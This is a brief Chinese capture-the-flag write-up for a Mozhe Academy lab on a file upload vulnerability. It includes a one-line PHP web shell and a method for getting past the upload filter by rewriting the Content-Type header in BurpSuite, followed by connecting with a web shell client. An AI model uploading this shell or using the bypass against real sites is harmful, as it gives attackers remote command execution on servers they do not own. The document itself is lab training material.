墨者学院-WebShell文件上传漏洞分析溯源(第4题)

2019-07-14  本文已影响0人  nohands_noob

靶场地址:
https://www.mozhe.cn/bug/detail/aVJuL2J4YVhUQkVxZi9xMkFRbDYyQT09bW96aGUmozhe

根据题目的提示,该题的上传限制是通过检测Content-Type来实现的
只需要修改Content-Type类型即可绕过上传

将一句话木马<?php @eval($_POST[cmd])?>写入cmd.php并上传,打开BurpSuite拦截,Content-Type的类型修改为image/png

成功绕过上传,开启菜刀连接找到key即可



上一篇 下一篇

猜你喜欢

热点阅读